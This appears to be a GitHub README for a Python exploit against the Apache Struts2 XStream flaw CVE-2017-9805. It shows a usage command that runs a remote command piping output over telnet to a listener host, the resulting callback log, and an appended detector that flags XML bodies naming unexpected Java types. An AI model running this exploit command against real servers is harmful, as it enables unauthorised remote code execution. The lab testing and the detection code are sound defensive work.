Exploit script for Apache Struts2 REST Plugin XStream RCE (CVE-2017-9805)

jongmartinez/-CVE-2017-9805-

Vulnerability information

Resources:

* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805

What is this?

A Python exploit script that executes commands remotely in the shell of a system hosting a Struts2 application vulnerable to S2-052.

Usage

python s2-052.py --target 'http://192.168.0.233/orders/3' --command "echo pwned | telnet 192.168.0.122 1234"

[*] Apache Struts XStream REST vulnerability - S2-052
[*] Creating payload ...
[*] Exploit packet has 2582 bytes.
[*] Sending exploit packet ...
[+] Exploit packet has been sent.
listening on [any] 1234 ...
connect to [192.168.0.122] from vulnerable.lan [192.168.0.233] 55791
pwned

Tested on the PentesterLab vulnerable machine for the S2-052 exercise.
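
For defenders, an added example (not part of this repository) that flags request bodies of the kind this exploit depends on: S2-052 is triggered when the REST plugin hands an XML request body to XStream, so a body naming Java types outside the application's own model package is worth alerting on. The `com.example.orders.` package, the request-record layout and the sample requests are assumptions constructed for illustration.

```python
import re

# Type names appear as element names or in class="..." attributes.
TYPE_REF = re.compile(r"<\s*([A-Za-z_][\w.$-]*)|class\s*=\s*[\"']([^\"']+)[\"']")
XML_TYPES = ("application/xml", "text/xml")
# Assumption: the application's own model package (hypothetical name).
ALLOWED_PREFIXES = ("com.example.orders.",)


def referenced_types(body):
    """Return every dotted (fully qualified) type name referenced in the body."""
    names = (elem or attr for elem, attr in TYPE_REF.findall(body))
    return {n for n in names if "." in n}


def inspect_request(req):
    """Return the unexpected types in an XML request body ([] means clean)."""
    ctype = req.get("content_type", "").split(";")[0].strip().lower()
    # Checking ".xml" paths as well is a deliberately conservative choice.
    if ctype not in XML_TYPES and not req.get("path", "").endswith(".xml"):
        return []
    types = referenced_types(req.get("body", ""))
    return sorted(t for t in types if not t.startswith(ALLOWED_PREFIXES))


# Constructed sample requests: not captured traffic and not a working payload.
SAMPLES = [
    {"path": "/orders/3", "content_type": "application/xml",
     "body": "<com.example.orders.Order><clientName>Bob</clientName>"
             "</com.example.orders.Order>"},
    {"path": "/orders/3", "content_type": "application/xml; charset=utf-8",
     "body": '<map><entry><value class="java.lang.ProcessBuilder">'
             "<command/></value></entry></map>"},
    {"path": "/orders/3", "content_type": "application/json",
     "body": '{"clientName": "Bob"}'},
]

if __name__ == "__main__":
    for req in SAMPLES:
        hits = inspect_request(req)
        print(req["path"], "ALERT" if hits else "ok", hits)
```

An allowlist of expected types catches unfamiliar gadget classes that a fixed signature list would miss; it complements, and does not replace, upgrading Struts to a release that fixes S2-052.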
